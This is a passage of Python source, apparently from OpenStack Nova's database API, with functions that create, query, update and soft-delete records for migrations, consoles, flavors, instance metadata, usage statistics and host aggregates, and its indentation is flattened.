soft_delete()
if count == 0:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
@main_context_manager.writer
def security_group_default_rule_create(context, values):
security_group_default_rule_ref = models.SecurityGroupIngressDefaultRule()
security_group_default_rule_ref.update(values)
security_group_default_rule_ref.save(context.session)
return security_group_default_rule_ref
@require_context
@main_context_manager.reader
def security_group_default_rule_list(context):
return _security_group_rule_get_default_query(context).all()
###################
@main_context_manager.writer
def provider_fw_rule_create(context, rule):
fw_rule_ref = models.ProviderFirewallRule()
fw_rule_ref.update(rule)
fw_rule_ref.save(context.session)
return fw_rule_ref
@main_context_manager.reader
def provider_fw_rule_get_all(context):
return model_query(context, models.ProviderFirewallRule).all()
@main_context_manager.writer
def provider_fw_rule_destroy(context, rule_id):
context.session.query(models.ProviderFirewallRule).\
filter_by(id=rule_id).\
soft_delete()
###################
@require_context
@main_context_manager.writer
def project_get_networks(context, project_id, associate=True):
# NOTE(tr3buchet): as before this function will associate
# a project with a network if it doesn't have one and
# associate is true
result = model_query(context, models.Network, read_deleted="no").\
filter_by(project_id=project_id).\
all()
if not result:
if not associate:
return []
return [network_associate(context, project_id)]
return result
###################
@pick_context_manager_writer
def migration_create(context, values):
migration = models.Migration()
migration.update(values)
migration.save(context.session)
return migration
@pick_context_manager_writer
def migration_update(context, id, values):
migration = migration_get(context, id)
migration.update(values)
return migration
@pick_context_manager_reader
def migration_get(context, id):
result = model_query(context, models.Migration, read_deleted="yes").\
filter_by(id=id).\
first()
if not result:
raise exception.MigrationNotFound(migration_id=id)
return result
@pick_context_manager_reader
def migration_get_by_id_and_instance(context, id, instance_uuid):
result = model_query(context, models.Migration).\
filter_by(id=id).\
filter_by(instance_uuid=instance_uuid).\
first()
if not result:
raise exception.MigrationNotFoundForInstance(migration_id=id,
instance_id=instance_uuid)
return result
@pick_context_manager_reader
def migration_get_by_instance_and_status(context, instance_uuid, status):
result = model_query(context, models.Migration, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid).\
filter_by(status=status).\
first()
if not result:
raise exception.MigrationNotFoundByStatus(instance_id=instance_uuid,
status=status)
return result
@pick_context_manager_reader_allow_async
def migration_get_unconfirmed_by_dest_compute(context, confirm_window,
dest_compute):
confirm_window = (timeutils.utcnow() -
datetime.timedelta(seconds=confirm_window))
return model_query(context, models.Migration, read_deleted="yes").\
filter(models.Migration.updated_at <= confirm_window).\
filter_by(status="finished").\
filter_by(dest_compute=dest_compute).\
all()
@pick_context_manager_reader
def migration_get_in_progress_by_host_and_node(context, host, node):
return model_query(context, models.Migration).\
filter(or_(and_(models.Migration.source_compute == host,
models.Migration.source_node == node),
and_(models.Migration.dest_compute == host,
models.Migration.dest_node == node))).\
filter(~models.Migration.status.in_(['accepted', 'confirmed',
'reverted', 'error',
'failed'])).\
options(joinedload_all('instance.system_metadata')).\
all()
@pick_context_manager_reader
def migration_get_in_progress_by_instance(context, instance_uuid,
migration_type=None):
    # TODO(Shaohe Feng): we should share the in-progress status list.
    # TODO(Shaohe Feng): also summarize all of the statuses into a new
    # MigrationStatus class.
query = model_query(context, models.Migration).\
filter_by(instance_uuid=instance_uuid).\
filter(models.Migration.status.in_(['queued', 'preparing',
'running',
'post-migrating']))
if migration_type:
query = query.filter(models.Migration.migration_type == migration_type)
return query.all()
@pick_context_manager_reader
def migration_get_all_by_filters(context, filters):
query = model_query(context, models.Migration)
if "status" in filters:
status = filters["status"]
status = [status] if isinstance(status, str) else status
query = query.filter(models.Migration.status.in_(status))
if "host" in filters:
host = filters["host"]
query = query.filter(or_(models.Migration.source_compute == host,
models.Migration.dest_compute == host))
elif "source_compute" in filters:
host = filters['source_compute']
query = query.filter(models.Migration.source_compute == host)
if "migration_type" in filters:
migtype = filters["migration_type"]
query = query.filter(models.Migration.migration_type == migtype)
if "hidden" in filters:
hidden = filters["hidden"]
query = query.filter(models.Migration.hidden == hidden)
return query.all()
##################
@pick_context_manager_writer
def console_pool_create(context, values):
pool = models.ConsolePool()
pool.update(values)
try:
pool.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.ConsolePoolExists(
host=values["host"],
console_type=values["console_type"],
compute_host=values["compute_host"],
)
return pool
@pick_context_manager_reader
def console_pool_get_by_host_type(context, compute_host, host,
console_type):
result = model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
filter_by(compute_host=compute_host).\
options(joinedload('consoles')).\
first()
if not result:
raise exception.ConsolePoolNotFoundForHostType(
host=host, console_type=console_type,
compute_host=compute_host)
return result
@pick_context_manager_reader
def console_pool_get_all_by_host_type(context, host, console_type):
return model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
options(joinedload('consoles')).\
all()
##################
@pick_context_manager_writer
def console_create(context, values):
console = models.Console()
console.update(values)
console.save(context.session)
return console
@pick_context_manager_writer
def console_delete(context, console_id):
# NOTE(mdragon): consoles are meant to be transient.
context.session.query(models.Console).\
filter_by(id=console_id).\
delete()
@pick_context_manager_reader
def console_get_by_pool_instance(context, pool_id, instance_uuid):
result = model_query(context, models.Console, read_deleted="yes").\
filter_by(pool_id=pool_id).\
filter_by(instance_uuid=instance_uuid).\
options(joinedload('pool')).\
first()
if not result:
raise exception.ConsoleNotFoundInPoolForInstance(
pool_id=pool_id, instance_uuid=instance_uuid)
return result
@pick_context_manager_reader
def console_get_all_by_instance(context, instance_uuid, columns_to_join=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload(column))
return query.all()
@pick_context_manager_reader
def console_get(context, console_id, instance_uuid=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(id=console_id).\
options(joinedload('pool'))
if instance_uuid is not None:
query = query.filter_by(instance_uuid=instance_uuid)
result = query.first()
if not result:
if instance_uuid:
raise exception.ConsoleNotFoundForInstance(
console_id=console_id, instance_uuid=instance_uuid)
else:
raise exception.ConsoleNotFound(console_id=console_id)
return result
##################
@main_context_manager.writer
def flavor_create(context, values, projects=None):
"""Create a new instance type. In order to pass in extra specs,
    the values dict should contain an 'extra_specs' key/value pair:
    {'extra_specs': {'k1': 'v1', 'k2': 'v2', ...}}
"""
specs = values.get('extra_specs')
specs_refs = []
if specs:
for k, v in specs.items():
specs_ref = models.InstanceTypeExtraSpecs()
specs_ref['key'] = k
specs_ref['value'] = v
specs_refs.append(specs_ref)
values['extra_specs'] = specs_refs
instance_type_ref = models.InstanceTypes()
instance_type_ref.update(values)
if projects is None:
projects = []
try:
instance_type_ref.save(context.session)
except db_exc.DBDuplicateEntry as e:
if 'flavorid' in e.columns:
raise exception.FlavorIdExists(flavor_id=values['flavorid'])
raise exception.FlavorExists(name=values['name'])
except Exception as e:
raise db_exc.DBError(e)
for project in set(projects):
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_ref.id,
"project_id": project})
access_ref.save(context.session)
return _dict_with_extra_specs(instance_type_ref)
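# Minimal illustrative values dict for the docstring above; the flavor name,
# id and extra spec key are hypothetical and a real flavor carries more
# fields:
#
#     values = {'name': 'm1.example', 'flavorid': 'example-1',
#               'memory_mb': 512, 'vcpus': 1, 'root_gb': 1,
#               'extra_specs': {'hw:cpu_policy': 'dedicated'}}
#     flavor = flavor_create(ctxt, values, projects=['some-project'])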
def _dict_with_extra_specs(inst_type_query):
"""Takes an instance or instance type query returned
by sqlalchemy and returns it as a dictionary, converting the
extra_specs entry from a list of dicts:
'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]
to a single dict:
'extra_specs' : {'k1': 'v1'}
"""
inst_type_dict = dict(inst_type_query)
extra_specs = {x['key']: x['value']
for x in inst_type_query['extra_specs']}
inst_type_dict['extra_specs'] = extra_specs
return inst_type_dict
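# For example, a row whose 'extra_specs' relationship yields
# [{'key': 'hw:numa_nodes', 'value': '2'}] comes back from this helper as a
# plain dict carrying 'extra_specs': {'hw:numa_nodes': '2'} (key name chosen
# for illustration only).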
def _flavor_get_query(context, read_deleted=None):
query = model_query(context, models.InstanceTypes,
read_deleted=read_deleted).\
options(joinedload('extra_specs'))
if not context.is_admin:
the_filter = [models.InstanceTypes.is_public == true()]
the_filter.extend([
models.InstanceTypes.projects.any(project_id=context.project_id)
])
query = query.filter(or_(*the_filter))
return query
@require_context
@main_context_manager.reader
def flavor_get_all(context, inactive=False, filters=None,
sort_key='flavorid', sort_dir='asc', limit=None,
marker=None):
"""Returns all flavors.
"""
filters = filters or {}
# FIXME(sirp): now that we have the `disabled` field for flavors, we
# should probably remove the use of `deleted` to mark inactive. `deleted`
# should mean truly deleted, e.g. we can safely purge the record out of the
# database.
read_deleted = "yes" if inactive else "no"
query = _flavor_get_query(context, read_deleted=read_deleted)
if 'min_memory_mb' in filters:
query = query.filter(
models.InstanceTypes.memory_mb >= filters['min_memory_mb'])
if 'min_root_gb' in filters:
query = query.filter(
models.InstanceTypes.root_gb >= filters['min_root_gb'])
if 'disabled' in filters:
query = query.filter(
models.InstanceTypes.disabled == filters['disabled'])
if 'is_public' in filters and filters['is_public'] is not None:
the_filter = [models.InstanceTypes.is_public == filters['is_public']]
if filters['is_public'] and context.project_id is not None:
the_filter.extend([
models.InstanceTypes.projects.any(
project_id=context.project_id, deleted=0)
])
if len(the_filter) > 1:
query = query.filter(or_(*the_filter))
else:
query = query.filter(the_filter[0])
marker_row = None
if marker is not None:
marker_row = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=marker).\
first()
if not marker_row:
            raise exception.MarkerNotFound(marker=marker)
query = sqlalchemyutils.paginate_query(query, models.InstanceTypes, limit,
[sort_key, 'id'],
marker=marker_row,
sort_dir=sort_dir)
inst_types = query.all()
return [_dict_with_extra_specs(i) for i in inst_types]
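# Pagination sketch: pass the flavorid of the last item of the previous page
# as the marker (all values below are illustrative):
#
#     page = flavor_get_all(ctxt, sort_key='flavorid', sort_dir='asc',
#                           limit=50, marker='example-1')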
def _flavor_get_id_from_flavor_query(context, flavor_id):
return model_query(context, models.InstanceTypes,
(models.InstanceTypes.id,),
read_deleted="no").\
filter_by(flavorid=flavor_id)
def _flavor_get_id_from_flavor(context, flavor_id):
result = _flavor_get_id_from_flavor_query(context, flavor_id).first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return result[0]
@require_context
@main_context_manager.reader
def flavor_get(context, id):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(id=id).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=id)
return _dict_with_extra_specs(result)
@require_context
@main_context_manager.reader
def flavor_get_by_name(context, name):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(name=name).\
first()
if not result:
raise exception.FlavorNotFoundByName(flavor_name=name)
return _dict_with_extra_specs(result)
@require_context
@main_context_manager.reader
def flavor_get_by_flavor_id(context, flavor_id, read_deleted):
"""Returns a dict describing specific flavor_id."""
result = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=flavor_id).\
order_by(asc(models.InstanceTypes.deleted),
asc(models.InstanceTypes.id)).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return _dict_with_extra_specs(result)
@main_context_manager.writer
def flavor_destroy(context, name):
"""Marks specific flavor as deleted."""
ref = model_query(context, models.InstanceTypes, read_deleted="no").\
filter_by(name=name).\
first()
if not ref:
raise exception.FlavorNotFoundByName(flavor_name=name)
ref.soft_delete(context.session)
model_query(context, models.InstanceTypeExtraSpecs, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
model_query(context, models.InstanceTypeProjects, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
def _flavor_access_query(context):
return model_query(context, models.InstanceTypeProjects, read_deleted="no")
@main_context_manager.reader
def flavor_access_get_by_flavor_id(context, flavor_id):
"""Get flavor access list by flavor id."""
instance_type_id_subq = _flavor_get_id_from_flavor_query(context,
flavor_id)
access_refs = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id_subq).\
all()
return access_refs
@main_context_manager.writer
def flavor_access_add(context, flavor_id, project_id):
"""Add given tenant to the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_id,
"project_id": project_id})
try:
access_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FlavorAccessExists(flavor_id=flavor_id,
project_id=project_id)
return access_ref
@main_context_manager.writer
def flavor_access_remove(context, flavor_id, project_id):
"""Remove given tenant from the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
count = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id).\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
if count == 0:
raise exception.FlavorAccessNotFound(flavor_id=flavor_id,
project_id=project_id)
def _flavor_extra_specs_get_query(context, flavor_id):
instance_type_id_subq = _flavor_get_id_from_flavor_query(context,
flavor_id)
return model_query(context, models.InstanceTypeExtraSpecs,
read_deleted="no").\
filter_by(instance_type_id=instance_type_id_subq)
@require_context
@main_context_manager.reader
def flavor_extra_specs_get(context, flavor_id):
rows = _flavor_extra_specs_get_query(context, flavor_id).all()
return {row['key']: row['value'] for row in rows}
@require_context
@main_context_manager.writer
def flavor_extra_specs_delete(context, flavor_id, key):
result = _flavor_extra_specs_get_query(context, flavor_id).\
filter(models.InstanceTypeExtraSpecs.key == key).\
soft_delete(synchronize_session=False)
# did not find the extra spec
if result == 0:
raise exception.FlavorExtraSpecsNotFound(
extra_specs_key=key, flavor_id=flavor_id)
@require_context
@main_context_manager.writer
def flavor_extra_specs_update_or_create(context, flavor_id, specs,
max_retries=10):
for attempt in range(max_retries):
try:
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
spec_refs = model_query(context, models.InstanceTypeExtraSpecs,
read_deleted="no").\
filter_by(instance_type_id=instance_type_id).\
filter(models.InstanceTypeExtraSpecs.key.in_(specs.keys())).\
all()
existing_keys = set()
for spec_ref in spec_refs:
key = spec_ref["key"]
existing_keys.add(key)
with main_context_manager.writer.savepoint.using(context):
spec_ref.update({"value": specs[key]})
for key, value in specs.items():
if key in existing_keys:
continue
spec_ref = models.InstanceTypeExtraSpecs()
with main_context_manager.writer.savepoint.using(context):
spec_ref.update({"key": key, "value": value,
"instance_type_id": instance_type_id})
context.session.add(spec_ref)
return specs
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
if attempt == max_retries - 1:
raise exception.FlavorExtraSpecUpdateCreateFailed(
id=flavor_id, retries=max_retries)
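# Illustrative call; existing keys are updated in place, new keys are
# inserted, and a concurrent writer triggers the retry loop above (the spec
# keys and flavor id are hypothetical):
#
#     flavor_extra_specs_update_or_create(
#         ctxt, 'example-1', {'hw:cpu_policy': 'dedicated',
#                             'hw:numa_nodes': '2'})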
####################
@main_context_manager.writer
def cell_create(context, values):
cell = models.Cell()
cell.update(values)
try:
cell.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.CellExists(name=values['name'])
return cell
def _cell_get_by_name_query(context, cell_name):
return model_query(context, models.Cell).filter_by(name=cell_name)
@main_context_manager.writer
def cell_update(context, cell_name, values):
cell_query = _cell_get_by_name_query(context, cell_name)
if not cell_query.update(values):
raise exception.CellNotFound(cell_name=cell_name)
cell = cell_query.first()
return cell
@main_context_manager.writer
def cell_delete(context, cell_name):
return _cell_get_by_name_query(context, cell_name).soft_delete()
@main_context_manager.reader
def cell_get(context, cell_name):
result = _cell_get_by_name_query(context, cell_name).first()
if not result:
raise exception.CellNotFound(cell_name=cell_name)
return result
@main_context_manager.reader
def cell_get_all(context):
return model_query(context, models.Cell, read_deleted="no").all()
########################
# User-provided metadata
def _instance_metadata_get_multi(context, instance_uuids):
if not instance_uuids:
return []
return model_query(context, models.InstanceMetadata).filter(
models.InstanceMetadata.instance_uuid.in_(instance_uuids))
def _instance_metadata_get_query(context, instance_uuid):
return model_query(context, models.InstanceMetadata, read_deleted="no").\
filter_by(instance_uuid=instance_uuid)
@require_context
@pick_context_manager_reader
def instance_metadata_get(context, instance_uuid):
rows = _instance_metadata_get_query(context, instance_uuid).all()
return {row['key']: row['value'] for row in rows}
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def instance_metadata_delete(context, instance_uuid, key):
_instance_metadata_get_query(context, instance_uuid).\
filter_by(key=key).\
soft_delete()
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def instance_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
if delete:
_instance_metadata_get_query(context, instance_uuid).\
filter(~models.InstanceMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_metadata_get_query(context, instance_uuid).\
filter(models.InstanceMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
context.session.add(meta_ref)
return metadata
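# Behaviour sketch for the 'delete' flag above (keys and values are made up):
# with delete=True the stored metadata becomes exactly the passed dict, since
# keys not present are soft-deleted; with delete=False missing keys are left
# untouched and only the passed keys are created or updated, e.g.:
#
#     instance_metadata_update(ctxt, instance_uuid,
#                              {'role': 'webserver'}, delete=False)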
#######################
# System-owned metadata
def _instance_system_metadata_get_multi(context, instance_uuids):
if not instance_uuids:
return []
return model_query(context, models.InstanceSystemMetadata,
read_deleted='yes').filter(
models.InstanceSystemMetadata.instance_uuid.in_(instance_uuids))
def _instance_system_metadata_get_query(context, instance_uuid):
return model_query(context, models.InstanceSystemMetadata).\
filter_by(instance_uuid=instance_uuid)
@require_context
@pick_context_manager_reader
def instance_system_metadata_get(context, instance_uuid):
rows = _instance_system_metadata_get_query(context, instance_uuid).all()
return {row['key']: row['value'] for row in rows}
@require_context
@pick_context_manager_writer
def instance_system_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
if delete:
_instance_system_metadata_get_query(context, instance_uuid).\
filter(~models.InstanceSystemMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_system_metadata_get_query(context, instance_uuid).\
filter(models.InstanceSystemMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceSystemMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
context.session.add(meta_ref)
return metadata
####################
@main_context_manager.writer
def agent_build_create(context, values):
agent_build_ref = models.AgentBuild()
agent_build_ref.update(values)
try:
agent_build_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.AgentBuildExists(hypervisor=values['hypervisor'],
os=values['os'], architecture=values['architecture'])
return agent_build_ref
@main_context_manager.reader
def agent_build_get_by_triple(context, hypervisor, os, architecture):
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
filter_by(os=os).\
filter_by(architecture=architecture).\
first()
@main_context_manager.reader
def agent_build_get_all(context, hypervisor=None):
if hypervisor:
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
all()
else:
return model_query(context, models.AgentBuild, read_deleted="no").\
all()
@main_context_manager.writer
def agent_build_destroy(context, agent_build_id):
rows_affected = model_query(context, models.AgentBuild).filter_by(
id=agent_build_id).soft_delete()
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
@main_context_manager.writer
def agent_build_update(context, agent_build_id, values):
rows_affected = model_query(context, models.AgentBuild).\
filter_by(id=agent_build_id).\
update(values)
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
####################
@require_context
@pick_context_manager_reader_allow_async
def bw_usage_get(context, uuid, start_period, mac):
values = {'start_period': start_period}
values = convert_objects_related_datetimes(values, 'start_period')
return model_query(context, models.BandwidthUsage, read_deleted="yes").\
filter_by(start_period=values['start_period']).\
filter_by(uuid=uuid).\
filter_by(mac=mac).\
first()
@require_context
@pick_context_manager_reader_allow_async
def bw_usage_get_by_uuids(context, uuids, start_period):
values = {'start_period': start_period}
values = convert_objects_related_datetimes(values, 'start_period')
return (
model_query(context, models.BandwidthUsage, read_deleted="yes").
filter(models.BandwidthUsage.uuid.in_(uuids)).
filter_by(start_period=values['start_period']).
all()
)
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def bw_usage_update(context, uuid, mac, start_period, bw_in, bw_out,
last_ctr_in, last_ctr_out, last_refreshed=None):
if last_refreshed is None:
last_refreshed = timeutils.utcnow()
# NOTE(comstud): More often than not, we'll be updating records vs
# creating records. Optimize accordingly, trying to update existing
# records. Fall back to creation when no rows are updated.
ts_values = {'last_refreshed': last_refreshed,
'start_period': start_period}
ts_keys = ('start_period', 'last_refreshed')
ts_values = convert_objects_related_datetimes(ts_values, *ts_keys)
values = {'last_refreshed': ts_values['last_refreshed'],
'last_ctr_in': last_ctr_in,
'last_ctr_out': last_ctr_out,
'bw_in': bw_in,
'bw_out': bw_out}
bw_usage = model_query(context, models.BandwidthUsage,
read_deleted='yes').\
filter_by(start_period=ts_values['start_period']).\
filter_by(uuid=uuid).\
filter_by(mac=mac).first()
if bw_usage:
bw_usage.update(values)
return bw_usage
bwusage = models.BandwidthUsage()
bwusage.start_period = ts_values['start_period']
bwusage.uuid = uuid
bwusage.mac = mac
bwusage.last_refreshed = ts_values['last_refreshed']
bwusage.bw_in = bw_in
bwusage.bw_out = bw_out
bwusage.last_ctr_in = last_ctr_in
bwusage.last_ctr_out = last_ctr_out
try:
bwusage.save(context.session)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to create
# the usage entry at the same time. First one wins.
pass
return bwusage
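# Illustrative periodic-task style call (the MAC address, counters and
# start_period are hypothetical):
#
#     bw_usage_update(ctxt, instance.uuid, 'fa:16:3e:00:00:01',
#                     start_period, bw_in=1024, bw_out=2048,
#                     last_ctr_in=10, last_ctr_out=20)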
####################
@require_context
@pick_context_manager_reader
def vol_get_usage_by_time(context, begin):
"""Return volumes usage that have been updated after a specified time."""
return model_query(context, models.VolumeUsage, read_deleted="yes").\
filter(or_(models.VolumeUsage.tot_last_refreshed == null(),
models.VolumeUsage.tot_last_refreshed > begin,
models.VolumeUsage.curr_last_refreshed == null(),
models.VolumeUsage.curr_last_refreshed > begin,
)).all()
@require_context
@pick_context_manager_writer
def vol_usage_update(context, id, rd_req, rd_bytes, wr_req, wr_bytes,
instance_id, project_id, user_id, availability_zone,
update_totals=False):
refreshed = timeutils.utcnow()
values = {}
# NOTE(dricco): We will be mostly updating current usage records vs
# updating total or creating records. Optimize accordingly.
if not update_totals:
values = {'curr_last_refreshed': refreshed,
'curr_reads': rd_req,
'curr_read_bytes': rd_bytes,
'curr_writes': wr_req,
'curr_write_bytes': wr_bytes,
'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
else:
values = {'tot_last_refreshed': refreshed,
'tot_reads': models.VolumeUsage.tot_reads + rd_req,
'tot_read_bytes': models.VolumeUsage.tot_read_bytes +
rd_bytes,
'tot_writes': models.VolumeUsage.tot_writes + wr_req,
'tot_write_bytes': models.VolumeUsage.tot_write_bytes +
wr_bytes,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
current_usage = model_query(context, models.VolumeUsage,
read_deleted="yes").\
filter_by(volume_id=id).\
first()
if current_usage:
if (rd_req < current_usage['curr_reads'] or
rd_bytes < current_usage['curr_read_bytes'] or
wr_req < current_usage['curr_writes'] or
wr_bytes < current_usage['curr_write_bytes']):
LOG.info(_LI("Volume(%s) has lower stats then what is in "
"the database. Instance must have been rebooted "
"or crashed. Updating totals."), id)
if not update_totals:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'])
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'])
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'])
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'])
else:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'] +
rd_req)
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'] + rd_bytes)
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'] +
wr_req)
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'] + wr_bytes)
current_usage.update(values)
current_usage.save(context.session)
context.session.refresh(current_usage)
return current_usage
vol_usage = models.VolumeUsage()
vol_usage.volume_id = id
vol_usage.instance_uuid = instance_id
vol_usage.project_id = project_id
vol_usage.user_id = user_id
vol_usage.availability_zone = availability_zone
if not update_totals:
vol_usage.curr_last_refreshed = refreshed
vol_usage.curr_reads = rd_req
vol_usage.curr_read_bytes = rd_bytes
vol_usage.curr_writes = wr_req
vol_usage.curr_write_bytes = wr_bytes
else:
vol_usage.tot_last_refreshed = refreshed
vol_usage.tot_reads = rd_req
vol_usage.tot_read_bytes = rd_bytes
vol_usage.tot_writes = wr_req
vol_usage.tot_write_bytes = wr_bytes
vol_usage.save(context.session)
return vol_usage
####################
@main_context_manager.reader
def s3_image_get(context, image_id):
"""Find local s3 image represented by the provided id."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(id=image_id).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_id)
return result
@main_context_manager.reader
def s3_image_get_by_uuid(context, image_uuid):
"""Find local s3 image represented by the provided uuid."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(uuid=image_uuid).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_uuid)
return result
@main_context_manager.writer
def s3_image_create(context, image_uuid):
"""Create local s3 image represented by provided uuid."""
try:
s3_image_ref = models.S3Image()
s3_image_ref.update({'uuid': image_uuid})
s3_image_ref.save(context.session)
except Exception as e:
raise db_exc.DBError(e)
return s3_image_ref
####################
def _aggregate_get_query(context, model_class, id_field=None, id=None,
read_deleted=None):
columns_to_join = {models.Aggregate: ['_hosts', '_metadata']}
query = model_query(context, model_class, read_deleted=read_deleted)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
@main_context_manager.writer
def aggregate_create(context, values, metadata=None):
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
read_deleted='no')
aggregate = query.first()
if not aggregate:
aggregate = models.Aggregate()
aggregate.update(values)
aggregate.save(context.session)
# We don't want these to be lazy loaded later. We know there is
# nothing here since we just created this aggregate.
aggregate._hosts = []
aggregate._metadata = []
else:
raise exception.AggregateNameExists(aggregate_name=values['name'])
if metadata:
aggregate_metadata_add(context, aggregate.id, metadata)
# NOTE(pkholkin): '_metadata' attribute was updated during
# 'aggregate_metadata_add' method, so it should be expired and
# read from db
context.session.expire(aggregate, ['_metadata'])
aggregate._metadata
return aggregate
@main_context_manager.reader
def aggregate_get(context, aggregate_id):
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id)
aggregate = query.first()
if not aggregate:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
return aggregate
@main_context_manager.reader
def aggregate_get_by_host(context, host, key=None):
"""Return rows that match host (mandatory) and metadata key (optional).
    :param host: matches host, and is required.
    :param key: matches metadata key, if not None.
"""
query = model_query(context, models.Aggregate)
query = query.options(joinedload('_hosts'))
query = query.options(joinedload('_metadata'))
query = query.join('_hosts')
query = query.filter(models.AggregateHost.host == host)
if key:
query = query.join("_metadata").filter(
models.AggregateMetadata.key == key)
return query.all()
@main_context_manager.reader
def aggregate_metadata_get_by_host(context, host, key=None):
query = model_query(context, models.Aggregate)
query = query.join("_hosts")
query = query.join("_metadata")
query = query.filter(models.AggregateHost.host == host)
query = query.options(contains_eager("_metadata"))
if key:
query = query.filter(models.AggregateMetadata.key == key)
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for kv in agg._metadata:
metadata[kv['key']].add(kv['value'])
return dict(metadata)
@main_context_manager.reader
def aggregate_get_by_metadata_key(context, key):
"""Return rows that match metadata key.
:param key Matches metadata key.
"""
query = model_query(context, models.Aggregate)
query = query.join("_metadata")
query = query.filter(models.AggregateMetadata.key == key)
query = query.options(contains_eager("_metadata"))
query = query.options(joinedload("_hosts"))
return query.all()
@main_context_manager.writer
def aggregate_update(context, aggregate_id, values):
if "name" in values:
aggregate_by_name = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
read_deleted='no').first())
if aggregate_by_name and aggregate_by_name.id != aggregate_id:
# there is another aggregate with the new name
raise exception.AggregateNameExists(aggregate_name=values['name'])
aggregate = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id).first())
set_delete = True
if aggregate:
if "availability_zone" in values:
az = values.pop('availability_zone')
if 'metadata' not in values:
values['metadata'] = {'availability_zone': az}
set_delete = False
else:
values['metadata']['availability_zone'] = az
metadata = values.get('metadata')
if metadata is not None:
aggregate_metadata_add(context,
aggregate_id,
